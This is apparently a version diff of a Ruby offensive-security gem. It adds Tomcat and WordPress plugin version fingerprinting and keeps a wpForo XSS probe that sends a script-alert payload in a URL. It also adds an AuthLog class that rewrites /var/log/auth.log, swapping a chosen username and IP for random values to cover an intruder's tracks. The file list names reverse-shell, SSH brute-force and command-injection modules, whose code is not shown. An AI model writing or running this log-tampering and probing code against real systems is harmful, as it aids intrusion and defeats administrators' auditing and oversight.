-          puts "[+] Looks like the site is Tomcat, running #{version}."
+      # adds `/docs/` to the instance variable @site
+      tc = Snackhack2.get(@site)
+      if tc.headers.has_key?("server")
+        if tc.headers['server'].match?("Tomcat")
+          puts "[+] Found Tomcat in the site's header... #{tc.headers['server']}\n\n\n"
+          tc_body = Snackhack2.get(File.join(@site, '/docs/'))
+          if tc_body.code.to_i.eql?(404)
+            if tc_body.body.include?('Tomcat')
+              doc = Nokogiri::HTML(tc.body)
+              # it will then extract the version displayed if
+              # the word is found
+              begin
+                # use to get the version
+                version = doc.at('h3').text
+                puts "[+] Looks like the site is Tomcat, running #{version}."
+              rescue => e
+                puts "ERROR: #{e}"
+              end
+            end
+          end
         end
-      else
-        puts "[+] Status code: #{tc.code}"
       end
     end
   end

data/lib/snackhack2/version.rb

@@ -1,5 +1,5 @@
 # frozen_string_literal: true
 
 module Snackhack2
-  VERSION = '0.6.8'
+  VERSION = '0.6.9'
 end

data/lib/snackhack2/webserver_log_cleaner.rb

@@ -16,6 +16,7 @@ module Snackhack2
       File.readlines(@path).each do |line|
         old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
         out += if old_ip.to_s == @ip
+                  # replaces the old IP with the new_ip
                  line.gsub(old_ip.to_s, new_ip)
                else
                  line
@@ -25,4 +26,58 @@ module Snackhack2
       File.open(@path, 'w+') { |file| file.write(out) }
     end
   end
+  class AuthLog
+    attr_accessor :ip, :user
+    def initialize(path: File.join("/var", "log", "auth.log.2"), user: "root")
+      @ip = ip
+      @user = user 
+      @user_list = ["user", "admin", "nobody", "proxy", "test", "tom", "frank", "irc", "sshd", "mail"]
+      @path = path
+    end
+    def remove_username
+      # replaces the username inputted with one
+      # 'randomly' picked from @user_list
+      out = ""
+      # loops through the given file
+      File.readlines(@path).each do |user|
+        new_user = user.match(/#{@user}/)
+        if new_user.to_s.eql?(@user)
+          # replaces the matched user with a 
+          # 'randomly' ( .sample) user
+          out += user.gsub(new_user.to_s, @user_list.sample)
+        else
+          # if it does not match it will add the non matched
+          # line to the newly created one
+          out += user
+        end
+      end
+    File.delete(@path)
+    File.open(@path, 'w+') { |file| file.write(out) }
+    end
+    def remove_ip
+      out = ''
+        # generate random IP
+        new_ip = Array.new(4) { rand(256) }.join('.')
+        File.readlines(@path).each do |line|
+          # Uses .match and regex to match IPs
+          old_ip = line.match(/((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/)
+          out += if old_ip.to_s == @ip
+                  # replace the foud ip with a randomly generated IP
+                   line.gsub(old_ip.to_s, new_ip)
+                 else
+                  # if it does not find the inputted IP
+                  # it will return the line
+                   line
+                 end
+        end
+        # deletes the @path
+        File.delete(@path)
+        # saves the new log to the old path
+        File.open(@path, 'w+') { |file| file.write(out) }
+    end
+    def remove_all
+      remove_ip
+      remove_username
+    end
+  end
 end

data/lib/snackhack2/website_links.rb

@@ -12,10 +12,14 @@ module Snackhack2
     end
 
     def run
+      # uses nokogiri to get the source of the page
       doc = Nokogiri::HTML(URI.open(@site))
+      # uses the xpath to get all the links on the source code
       links = doc.xpath('//a')
+      # gets the links
       all_links = links.map { |e| e['href'] }.compact
-      content = all_links.uniq.join("\n")
+      # remove any duplicates
+      content = all_links.uniq.join("\n")   
       if @save_file
         Snackhack2.file_save(@site, 'links', content)
       else

data/lib/snackhack2/website_meta.rb

@@ -6,7 +6,7 @@ module Snackhack2
   class WebsiteMeta
     attr_accessor :site
 
-    def initialize()
+    def initialize
       @site = site
     end
 
@@ -14,17 +14,17 @@ module Snackhack2
       doc = Nokogiri::HTML(URI.open(@site))
       posts = doc.xpath('//meta')
       posts.each do |link|
+        # displays the meta tags of name, content and name
         puts "#{link.attributes['name']}: #{link.attributes['content']}" unless link.attributes['name'].nil?
       end
     end
     def description
       begin
         doc = Nokogiri::HTML(URI.open("https://#{@site}", "User-Agent" => Snackhack2::UA))
-        if !doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
-          doc.xpath('/html/head/meta[@name="description"]/@content').to_s
+        unless doc.xpath('/html/head/meta[@name="description"]/@content').to_s.empty?
+          # extracts the description tag from meta tags
+          puts doc.xpath('/html/head/meta[@name="description"]/@content').to_s
         end
-        #dsp << 
-
       rescue => e
         puts "ERROR: #{e}"
       end

data/lib/snackhack2/wordpress.rb

@@ -54,6 +54,7 @@ module Snackhack2
     end
 
     def wp_login
+      # detects if the site is using wordpress
       percent = 0
       ## todo: maybe add Bayes Theorem to detect wp
       wp = ['wp-includes', 'wp-admin', 'Powered by WordPress', 'wp-login.php', 'yoast.com/wordpress/plugins/seo/',
@@ -71,25 +72,73 @@ module Snackhack2
       puts "Wordpress Points: #{percent}"
     end
 
-    def yoast_seo
+    def yoast_seo(print_version: false)
+      # checks to see if the wordpress site
+      # uses the yoast seo plugin
       ys = Snackhack2.get(@site)
-      return unless ys.code == 200
-
-      yoast_version = ys.body.split('<!-- This site is optimized with the Yoast SEO Premium plugin')[1].split(' -->')[0]
-      ['This site is optimized with the Yoast SEO plugin',
-       'This site is optimized with the Yoast SEO Premium plugin'].each do |site|
-        puts "#{ys.body.scan(/#{site}/).shift} with version #{yoast_version}" unless ys.body.scan(/#{site}/).shift.nil?
+      if ys.code.to_i.eql?(200)
+        if ys.body.match?("Yoast")
+          v = ys.body.scan(/This site is optimized with the Yoast SEO plugin\sv\d\d\.\d/).join(" ")
+          # makes sure the word 'plugin' is in the 'v' string
+          if v.include?("plugin") 
+            # gets the version
+            version = v.split("plugin")[1].strip
+          end
+        end
+      end
+      unless print_version
+        return version
+      else
+        puts "Yoast Seo is running version: #{version}"
       end
     end
 
-    def all_in_one_seo
+    def find_plugins(print_version: true)
+      found_versions = {}
       alios = Snackhack2.get(@site)
-      return unless alios.code == 200
-      return unless alios.body.scan(/(All in One SEO Pro\s\d.\d.\d)/)
-
-      puts "Site is using the plugin: #{alios.body.match(/(All in One SEO Pro\s\d.\d.\d)/)}"
+      if alios.code.eql?(200)
+        data = {"Yoast SEO plugin " => 'Yoast SEO plugin v\d\d\.\d',
+                "MonsterInsights plugin" => 'MonsterInsights plugin v\d\d\.\d\.\d',
+                "All in One SEO" => 'All in One SEO \d\.\d\.\d\.\d',
+                "Site Kit by Google" => 'Site Kit by Google \d\.\d\d\d\.\d',
+                 "Google Analytics by ExactMetrics plugin" => 'Google Analytics by ExactMetrics plugin v\d\.\d\d\.\d', "HubSpot WordPress plugin" => 'HubSpot WordPress plugin v\d\d\.\d\.\d\d', "Simple Social Buttons" => 'Simple Social Buttons \d\.2\.0', 
+                 "Powered by Slider Revolution" => 'Powered by Slider Revolution \d\.\d\.\d\d', "Generated By Events-Calendar - Version:" => 'Generated By Events-Calendar - Version: \d\.\d\.\d',
+                 "Open Graph and Twitter Card Tags" => 'Open Graph and Twitter Card Tags \d\.\d\.\d',
+                 "Google Analytics Tracking by Google Analyticator" => 'Google Analytics Tracking by Google Analyticator \d\.\d\.\d', "REVOLUTION SLIDER" => 'REVOLUTION SLIDER \d\.\d\.\d',
+                 "Generated By sidebarTabs" => 'Generated By sidebarTabs \d\.\d',\
+                 "Yoast WordPress SEO plugin" => 'Yoast WordPress SEO plugin v\d\.\d\.\d',
+                 "Yoast SEO Premium plugin" => 'Yoast SEO Premium plugin v\d\d\.\d \(Yoast SEO v27\.1\.1\)',
+                 "Google Analytics by MonsterInsights plugin" => 'Google Analytics by MonsterInsights plugin v\d\d\.\d\.\d',
+                 "All in One SEO (AIOSEO\)" => 'All in One SEO \(AIOSEO\) \d\.\d\.\d',
+                 "EduBlock PRO" => 'EduBlock PRO \d\.\d\.\d',
+                 "WPZOOM Framework" => 'WPZOOM Framework \d\.0\.\d',
+                 "WPML" => 'WPML ver:\d\.\d\.\d',
+                 "Redux" => 'Redux \d\.\d\.\d',
+                 "WordPress Download Manager"=> 'WordPress Download Manager \d\.\d\.\d\d',
+                 "WP Rocket" => 'WP Rocket \d\.\d\d\.\d',
+                 "WooCommerce" => 'WooCommerce \d\d\.\d\.\d',
+                 "Yoast SEO plugin" => 'Yoast SEO plugin v\d\.\d',
+                 "Divi" => 'Divi v\.\d\.\d\d\.\d',
+                 "WordPress" => 'WordPress \d\.\d\.\d',
+                 "Newtek ChildTheme Base for Divi " => 'Newtek ChildTheme Base for Divi v\.\d\.\d',
+                 "Presence" => 'Presence \d\.\d\.\d\d',
+                 "WPZOOM Framework" => 'WPZOOM Framework \d\.\d\.\d'}
+        data.each do |name, regex|
+          version = alios.body.scan(/#{regex}/)
+
+          unless version.empty?
+            found_versions[name] = version.shift.gsub(name, "").strip
+          end
+        end
+      end
+      unless print_version 
+        return found_versions
+      else
+        found_versions.each do |name, version|
+          puts "#{name}: #{version}" 
+        end
+      end
     end
-
     def wp_log
       wplog_score = 0
       wp = ['\wp-content\plugins', 'PHP Notice', 'wp-cron.php', '/var/www/html', 'Yoast\WP\SEO', 'wordpress-seo']
@@ -105,6 +154,7 @@ module Snackhack2
 
     def wp_plugin
       wp_plugin_score = 0
+      # text in which it will search for
       wp = ['Index of', 'Name', 'Last modified', 'Size', 'Parent Directory', '/wp-content/plugins']
       plug = Snackhack2.get(File.join(@site, '/wp-content/plugins/'))
       if plug.code == 200

data/lib/snackhack2/wpForo_Forum.rb

@@ -14,6 +14,7 @@ module Snackhack2
     def run
       wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
       if wp.code == 200
+        # if `XSS` is found it means the site MIGHT be vulnerable
         puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
       else
         puts "[+] HTTP code #{wp.code}"

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: snackhack2
 version: !ruby/object:Gem::Version
-  version: 0.6.8
+  version: 0.6.9
 platform: ruby
 authors:
 - mike
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2025-11-20 00:00:00.000000000 Z
+date: 2026-03-25 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: httparty
@@ -87,6 +87,7 @@ files:
 - lib/snackhack2/emails.rb
 - lib/snackhack2/forward_remote.rb
 - lib/snackhack2/google_analytics.rb
+- lib/snackhack2/host_injection.rb
 - lib/snackhack2/indirect_command_injection.rb
 - lib/snackhack2/iplookup.rb
 - lib/snackhack2/list_users.rb
@@ -98,6 +99,7 @@ files:
 - lib/snackhack2/portscan.rb
 - lib/snackhack2/reverse_shell.rb
 - lib/snackhack2/robots.rb
+- lib/snackhack2/ruby_comments.rb
 - lib/snackhack2/screenshots.rb
 - lib/snackhack2/sitemap.rb
 - lib/snackhack2/sshbrute.rb